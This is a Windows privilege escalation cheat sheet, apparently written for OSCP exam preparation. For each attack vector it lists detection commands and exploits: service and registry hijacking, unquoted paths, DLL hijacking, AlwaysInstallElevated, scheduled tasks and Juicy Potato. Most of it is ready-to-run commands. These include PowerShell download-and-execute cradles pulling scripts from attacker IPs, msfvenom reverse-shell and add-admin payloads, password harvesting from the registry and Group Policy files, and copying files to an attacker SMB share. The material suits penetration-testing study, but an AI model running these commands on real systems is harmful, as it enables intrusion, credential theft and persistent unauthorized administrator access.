OSCP
Search…
PrivEsc - Windows

Introduction

The aim of this cheat sheet is to give you a quick overview of possible attack vectors that can be used to elevate your privileges to system and is based on the mind map below. For each attack vector it explains how to detect whether a system is vulnerable and gives you an example on how to exploit it.

Tooling

Before diving into the different attack vectors, I listed some commands for general privesc enumeration scripts that I used during OSCP. To gain some efficiency, I moved all scripts in one directory and made them remotely accessible through smb and web.
1
#host files in current directory through smb
2
impacket-smbserver share .
3
4
#host files in current directory through http
5
python -m SimpleHTTPServer 1234
Copied!
Tip: quickly set up the SMB and web servers by making aliases for the commands above, f.e.webup and smbup.
Below, I listed the different PrivEsc tools and files that I would generally have hosted through the SMB and HTTP server for quick access.
1
2019-11-17-mssb.xls
2
accesschk64.exe
3
accesschk.exe
4
accesschk-XP.exe
5
Invoke-PowerShellTcp.ps1
6
Invoke-SessionGopher.ps1
7
Invoke-Tater.ps1
8
Invoke-TokenManipulation.ps1
9
jaws-enum.ps1
10
kernelAbatchy/ #precompiled kernel exploits from https://github.com/abatchy17/WindowsExploits
11
kernelSecWiki/ #precompiled kernel exploits from https://github.com/SecWiki/windows-kernel-exploits
12
lazagne.exe
13
Powerless.bat
14
PowerUp.ps1
15
Seatbelt.exe
16
SharpUp.exe
17
Sherlock.ps1
18
tmp/ # folder for random files that you want to transfer
19
winbin/ #a copy of windows binaries in /usr/share/windows-binaries/
20
nc64.exe
21
nc.exe
22
plink.exe
23
vncviewer.exe
24
wget.exe
25
whoami.exe
26
...
27
windows-exploit-suggester.py
28
winPEASany.exe
29
winPEASx64.exe
30
winPEASx86.exe
Copied!
I used the following commands to launch the tools quickly without having to transfer them first on the target itself.
1
#WinPEAS - I love this tool
2
//192.168.194.141/share/winPEASx64.exe searchall cmd
3
4
#PowerUp
5
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.73:1234/PowerUp.ps1'); Invoke-AllChecks"
6
7
#Sherlock
8
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.194.141:1234/Sherlock.ps1'); Find-AllVulns"
9
10
#JAWS
11
powershell.exe -ExecutionPolicy Bypass -File //192.168.194.141/share/jaws-enum.ps1
12
13
#Seatbelt - search for non standard services
14
//192.168.194.141/share/Seatbelt.exe NonstandardServices
15
16
#Lazagna - search for passwords
17
//192.168.194.141/share/lazagne.exe all
18
19
#SessionGopher - search for passwords
20
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http:/
Copied!

Kernel

Missing patches are probably the easiest way to elevate your privileges. This however can make your target system unstable so only use them when getting desperate.
In the OSCP lab, there is almost always a way to elevate your privileges without the need for kernel exploits. Try to find the 'intended' way to maximize your learning!
Detect if vulnerable: Get patchlevel and check for exploits
1
#get the system information of target system, this includes installed hotfixes
2
systeminfo
3
4
#copy paste the whole input to a file in kali
5
6
#check for kernel exploits (in kali)
7
python windows-exploit-suggester.py -d 2019-11-17-mssb.xls -i systeminfo.txt
Copied!
Exploit: I always used a public exploit and never lost time by compiling my own kernel exploits. A really good list of precompiled exploits can be found here:
GitHub - SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合
GitHub

Services

When elevating our privileges through the services on a Windows machine, we search for services that run under system privileges and that we can manipulate in such a way that when the service restarts, our exploit is executed.

BinPath

Each Windows service specifies the location of the executable that has to be executed through the configuration variable 'BinPath'. If we can change the BinPath variable to the location of our payload and make it run under LocalSystem privileges, we are in.
How to detect vulnerable services: You are looking for services that you have write access to. This way you can adjust the binary path of the executable that is normally executed to the location of your exploit.
1
#Check for what services we have write access by specifying one of our user roles (also check for the power users group)
2
accesschk.exe -uwcqv "Authenticated Users" *
3
accesschk.exe -uwcqv "Everyone" *
4
5
#Check our permissions for one specific service
6
accesschk.exe -ucqv daclsvc
7
8
#Check under what privileges a system runs
9
sc qc daclsvc
Copied!
You basically need one of the following permissions to the service and then you're good to go:
Permission
Why good for us?
SERVICE_CHANGE_CONFIG
Can reconfigure the service binary
WRITE_DAC
Can reconfigure permissions, leading to SERVICE_CHANGE_CONFIG
WRITE_OWNER
Can become owner, reconfigure permissions
GENERIC_WRITE
Inherits SERVICE_CHANGE_CONFIG
GENERIC_ALL
Inherits SERVICE_CHANGE_CONFIG
To elevate privileges the BinPath way, services don't have to be configured to run under LocalSystem. As we can alter the configuration, we can also specify under what privileges it should run.

Exploit

1
#Change the privileges to LocalSystem if that is not yet the case
2
sc config daclsvc obj= ".\LocalSystem" password= ""
3
4
#add command in path
5
sc config daclsvc binpath= "net localgroup administrators xhack /add"
6
7
#restart service
8
sc start daclsvc
9
10
#verify if the user 'xhack' is succesfully added to the administrators group
11
net localgroup Administrator
Copied!

Unquoted Service Path

If the service binary path is not enclosed within quotes and is having spaces, it would handle the space as a break and pass the rest of the service path as an argument. For example, if we have an executable in the following unquoted directory C:\Program Files\Unquoted Path Service\Common Files\uncsvc.exe, then Windows will look for the executable consecutively in following paths:
  1. 1.
    C:\Program.exe
  2. 2.
    C:\Program Files\Unquoted.exe
  3. 3.
    C:\Program Files\Unquoted Path Service\Common.exe
  4. 4.
    C:\Program Files\Unquoted Path Service\Common Files\uncsvc.exe
If we can place our payload in one of previous locations and restart the service, our executable is run instead of the intended executable.
How to detect vulnerable services: You're looking for services that meet the following three criteria:
  • the path of the binary location does not contain quotes
  • service runs under LocalSystem
  • you have write access to one of the exploitable directories
1
#Check for services in which the executable paths don't contain quotes
2
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
3
#"
4
5
#do following checks for unquoted service paths:
6
#service runs under system (SERVICE_START_NAME: LocalSystem)
7
sc qc unquotedsvc
8
#extra verification if bin path is unquoted (BINARY_PATH_NAME)
9
sc qc unquotedsvc
10
#you have write access to one of these directories
11
icacls "C:\ "
12
icacls "C:\Program Files"
13
icacls "C:\Program Files\Unquoted Path Service"
Copied!
Exploit
1
#Choose the name of the exploit according to the paths the system will look for the binaries
2
#in our example below, we have write access to the "C:\Program Files\Unquoted Path Service\" directory
3
C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
4
#Therefor we choose the name following binary name
5
--> common.exe
6
7
8
#create exploit
9
msfvenom -p windows/exec CMD='net user xhack SecurePass1337 /add; net localgroup administrators xhack /add' -f exe-service -o common.exe
10
11
#place exploit in the target folder, so in here
12
C:\Program Files\Unquoted Path Service\
13
14
#restart service
15
sc start unquotedsvc
16
Copied!

Registry

The HKLM\SYSTEM\CurrentControlSet\Services registry tree stores information about each service on the system. On of the variables is the location of the service binary. When we can change the service binary to our executable, we are king. Note that this approach is very similar to the BinPath way, but this time we use the registry instead of the sc command line utility.
How to detect vulnerable services: To exploit this vulnerability, services need to meet the following two requirements:
  • we have write access to the registry of the service
  • the service is running with LocalSystem privileges
1
#1. get a list of all services
2
accesschk64.exe -kvusw hklm\System\CurrentControlSet\services
3
powershell -nop -exec bypass -c "Get-Acl -Path hklm:\System\CurrentControlSet\services\* | select Path,AccessToString | Format-List"
4
5
#2. copy the list to sublime/notepad++/...
6
7
#3. search for following strings (based on powershell output)
8
"NT AUTHORITY\INTERACTIVE Allow FullControl" #(Everybody that logs in on physical computer, gets assigned to group INTERACTIVE)
9
"BUILTIN\Users Allow FullControl "
10
"NT AUTHORITY\Authenticated Users FullControl"
11
"Everyone Allow FullControl"
12
other groups you are part of (whoami /all)
Copied!
Exploit:
1
#create payload
2
msfvenom -p windows/exec CMD='net user xhack SecurePass1337 /add; net localgroup administrators xhack /add' -f exe-service -o payload.exe
3
4
#place payload in writable folder
5
cd C://Temp
6
cp //192.168.194.141/share/tmp/payload.exe .
7
8
#change registry path to executable (regsvc is vulnerable service name in this example)
9
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\payload.exe /f
10
11
#restart service
12
sc start regsvc
13
Copied!

Executable file

Sometimes, you don't have to think too hard. If you can simply change the executable file with your payload, this could be a viable path to privilege escalation.
How to detect vulnerable services: Search for services that run as LocalSystem. For each of these services, check whether you have write access to the executable that is executed by the service. This makes the following requirements:
  • we have write access to the executable of the service
  • the service is running with LocalSystem privileges
1
#for each service, check the permissions of the executable, if you have write / full access, overwrite executable with own payload
2
accesschk64.exe -wvu "C:\Program Files\File Permissions Service"
Copied!
Tip: To speed up the process (not having to check all services), only verify the services that WinPEAS marks as 'Special' aka non-default services
Exploit
1
#Create your payload
2
msfvenom -p windows/exec CMD='net user xhack SecurePass1337 /add; net localgroup administrators xhack /add' -f exe-service -o payload.exe
3
4
#place payload in writable folder (in the example below, filepermservice.exe is the vulnerable executable)
5
cd "c:\Program Files\File Permissions Service"
6
cp //192.168.194.141/share/tmp/payload.exe .
7
mv payload.exe filepermservice.exe
8
9
#restart service
10
sc start regsvc
Copied!

DLL Hijacking

Services often run programs that on their turn, load and execute separate DLLs. These DLLs are not always secured with the correct privileges, or are just not present on the current system. When we can make a service (with system privileges) load our malicious payload instead, we can use it to get system.
How to detect vulnerable services: I haven't figured out a foolproof way of detecting vulnerable DLLs so I will kindly refer you to fuzzysecurity's guide:
1
#Check the path you are using
2
echo %path%
3
4
#Check for all dirs in path what access rights you have
5
accesschk.exe -dqv "C:\Python27"
6
cacls "C:\Python27"
7
8
#Check if any service is calling for DLL's that do not exist on the system
9
#if you have RDP, you can use Process Monitor from the systinternals suite
10
#check in the registry if any dll is loaded ("ServiceDLL")
11
#search for the location of the DLL
12
dir wlbsctrl.dll /s
13
14
#check if the service restarts at boot time
15
sc qc IKEEXT
16
START_TYPE: 2 AUTO_START
Copied!
Exploit
1
#generate malicious DLL
2
msfpayload windows/shell_reverse_tcp lhost=10.11.0.79 lport=9988 -o <name of hijackable dll>.dll
3
4
#place dll in writable path folder
5
6
#reboot system / restart service
Copied!

Password mining

Administrators are often lazy and use weak passwords or reuse them. When performing our password mining, we scout for (hashed) passwords that administrators maybe reused for their main account. Further these passwords could also get us access to other services like databases.

Passwords stored by user

Sometimes users store their passwords in plain-text in an unsecured file. When we can find these passwords, it is a quick win for us.
1
#check for files in home folders of users with names that could mean they hold passwords
2
dir /s C:\Users
Copied!

Registry

Sometimes developers and admins store passwords of services in the registry.
1
# VNC
2
reg query "HKCU\Software\ORL\WinVNC3\Password"
3
--> crack password with vncpwd.exe
4
5
# Windows autologin
6
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUsername
7
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
8
9
# SNMP Parameters
10
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
11
12
# Putty
13
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
14
#NOTE: if you get redirected, use that redirect
15
reg query "HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\BWP123F42"
16
17
# Search for password in registry
18
reg query HKLM /f password /t REG_SZ /s
19
reg query HKCU /f password /t REG_SZ /s
Copied!

Configuration files

When programs have to authenticate to other services, the passwords are often stored in the configuration files. The following list contains juicy files that could get us lucky.
  1. 1.
    Windows configuration files
1
c:\sysprep.inf
2
c:\sysprep\sysprep.xml
3
c:\unattend.xml
4
%WINDIR%\Panther\Unattend\Unattended.xml
5
%WINDIR%\Panther\Unattended.xml
Copied!
2. Config files of web server
1
#search for the file
2
C:\inetpub\wwwroot\web.config
3
#search for password in following line "connectionString"
Copied!
3. VNC config files
1
dir c:\*vnc.ini /s /b
2
dir c:\*ultravnc.ini /s /b
3
dir c:\ /s /b | findstr /si *vnc.ini
Copied!
4. McAfee SiteList
1
#on target
2
#search for file SiteList.xml
3
dir /s/b SiteList.xml
4
#copy file to kali (after setting up impacket-smbserver)
5
cp "C:\Users\All Users\McAfee\Common Framework\SiteList.xml" //192.168.194.141/share/tmp
6
7
#on kali
8
#grep encrypted password
9
grep -i password SiteList.xml
10
#decrypt password
11
python mcafee_sitelist_pwd_decrypt.py [encryptedpassw]
Copied!
5. group policy preference
1
#getting the file:
2
# Output environment-variables
3
set
4
# Look for the following:
5
LOGONSERVER=\\NAMEOFSERVER
6
USERDNSDOMAIN=WHATEVER.LOCAL
7
# Look up ip-addres
8
nslookup nameofserver.whatever.local
9
# It will output something like this
10
Address: 192.168.1.101
11
# Now we mount it
12
net use z: \\192.168.1.101\SYSVOL
13
# And enter it
14
z:
15
# Now we search for the groups.xml file
16
dir Groups.xml /s
17
18
#decrypting the password
19
#the pass is AES encrypted but the key is publicly known
20
gpp-decrypt encryptedpassword
21
22
#other files for which this might be the case
23
Services\Services.xml #Element-Specific Attributes
24
ScheduledTasks\ScheduledTasks.xml #Task Inner Element, TaskV2 Inner Element, ImmediateTaskV2 Inner Element
25
Printers\Printers.xml #SharedPrinter Element
26
Drives\Drives.xml #Element-Specific Attributes
27
DataSources\DataSources.xml #Element-Specific Attributes
Copied!
6. The getting desperate searches
1
#find the string 'password' in all files of certain file type
2
findstr /si password *.txt
3
findstr /si password *.xml
4
findstr /si password *.ini
5
6
#Find all these strings in config files.
7
dir /s *pass* == *cred* == *vnc* == *.config*
8
9
# Find all passwords in all files.
10
findstr /spin "password" *.*
11
findstr /spin "password" *.*
Copied!

Registry

Autorun (less applicable for OSCP)

Programs that are listed as autorun in the registry are executed automatically when users login to the system. What is interesting to us, is that the executable runs with the privileges of the user that logs in.
Detect vulnerable autorun programs: We need the following two requirements:
  • We need a startup program for which we have write access to the binary
  • We need an Administrator to login into the system
1
#check what programs run on startup
2
wmic startup get caption,command 2>nul
3
#check if you have write access to the binary of the executable
4
icacls "C:\Program Files\Autorun Program\program.exe"
Copied!
Exploit (less applicable for OSCP as you need someone else loging in as admin)
  1. 1.
    replace executable with reverse shell / admin user add command
  2. 2.
    wait till someone logs in with admin

AlwaysInstallElevated

When the AlwaysInstallElevated key is set for both HKLM and HKCU in the registry, every newly installed program automatically obtains system privileges. We just have to install our payload and we have system. Can it get easier for us?
Detect if vulnerable:
1
#check if AlwaysInstallElevated key is set
2
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
3
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Copied!
Exploit
1
#generate payload
2
#No uac format
3
msfvenom -p windows/adduser USER=rottenadmin PASS=[email protected]! -f msi-nouac -o alwe.msi
4
#Using the msiexec the uac wont be prompted
5
msfvenom -p windows/adduser USER=rottenadmin PASS=[email protected]! -f msi -o alwe.msi
6
7
#install msi file
8
msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi
Copied!

Scheduled tasks

Through scheduled tasks, admins can specify what programs should start immediately after booting the system. When we can replace the binary that would be loaded, we can get our payload executed with higher privileges.
How to detect vulnerable scheduled tasks: First get a list of all scheduled task with system privileges, then check if you have write access to the binary. This makes the following requirements:
  • the scheduled task runs under system
  • you have write access to the executable to which the task points (or exe is missing)
1
#on target
2
#List all scheduled tasks with system privileges
3
schtasks /query /fo LIST /v
4
5
#on kali
6
#copy over list and check for tasks as system
7
cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
8
9
#on target
10
#check if you have write access to executable to which the task points
11
accesschk.exe -dqv "C:\Missing Scheduled Binary\"
12
Copied!
Exploit
1
#Generate new payload
2
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o test.exe
3
#replace the task executable with our payload
Copied!

Hot Potato

This technique is a combination of two known windows issues like NBNS spoofing and NTLM relay with the implementation of a fake WPAD proxy server which is running locally on the target host.
NTLM authentication via the same protocol like SMB has been already patched by Microsoft however this technique is using HTTP to SMB authentication in order to create a high privilege service as the HTTP request might come from a high privilege service like the Windows update. Since the traffic contains the NTLM credentials and is passing through a fake proxy server it can be captured and passed to a local SMB listener to create an elevated service which can execute any command as SYSTEM.

Detect

Check the privileges of the current user. If the user has one of following privs, you can get system
  • SeImpersonatePrivilege
  • SeAssignPrimaryPrivilege
  • SeTcbPrivilege
  • SeBackupPrivilege
  • SeRestorePrivilege
  • SeCreateTokenPrivilege
  • SeLoadDriverPrivilege
  • SeTakeOwnershipPrivilege
  • SeDebugPrivilege

Exploit

When you have SeImpersonatePrivilege or SeAssignPrimaryPrivilege you can get system through the 'Rotten Potato exploit'. The updated version of this exploit is called 'Juicy Potato'
1
#executable - JuicyPotato
2
#generate reverse shell that we want to trigger as a system shell
3
msfvenom -p windows/shell_reverse_tcp LHOST=$kaliip LPORT=444 -e x86/shikata_ga_nai -f exe -o rev.exe
4
#trigger the exploit (https://github.com/ivanitlearning/Juicy-Potato-x86/releases)
5
JuicyPotato.exe -l 1340 -p C:\users\User\rev.exe -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
6
7
#Powershell - Invoke-Tater1
8
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.194.141:1234/Invoke-Tater.ps1'); Invoke-Tater -Trigger 1 -Command 'net localgroup Administrators user /add'"
Copied!

Startup applications (less applicable for OSCP)

Detect if vulnerable:
1
#Check if you have write permissions to startup folder
2
icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
Copied!
Exploit:
  • generate msfpayload and place it in this folder
  • restart the machine with Administrator credentials

Firewalled services

Some machines firewall several ports such that they are only accessible from the localhost. If we can execute code through services that are running as system, we can elevate our privileges to system.
Detect for vulnerable services:
1
#check what interfaces are only available to the localhost (compare to your nmap scan)
2
netstat -ano
3
4
#check the executable from a specific service
5
tasklist /fi "pid eq 1544"
6
7
#check if that service runs as system and has a vulnerability
Copied!
Exploit
For databases, you can gain RCE through the command functionality or find passwords in the database itself.
When dealing with web apps that are only accessible to the localhost, we can forward them to our kali machine:
1
#on kali
2
#start the ssh service
3
service ssh start
4
#place the plink.exe binary in the smb shared folder
5
6
#on the target
7
#tunnel the traffic
8
//10.11.0.79/share/winbin/plink.exe [email protected] -R 4000:127.0.0.1:80
9
#here 10.11.0.79 is ip of kali
10
#4000 is local port on kali to bind web app to
11
#80 is local port on target that we want to forward
12
13
#on kali
14
#go in the browser to following url and you should see the forwarded web app
15
http://localhost:4000
16
Copied!
Last modified 1yr ago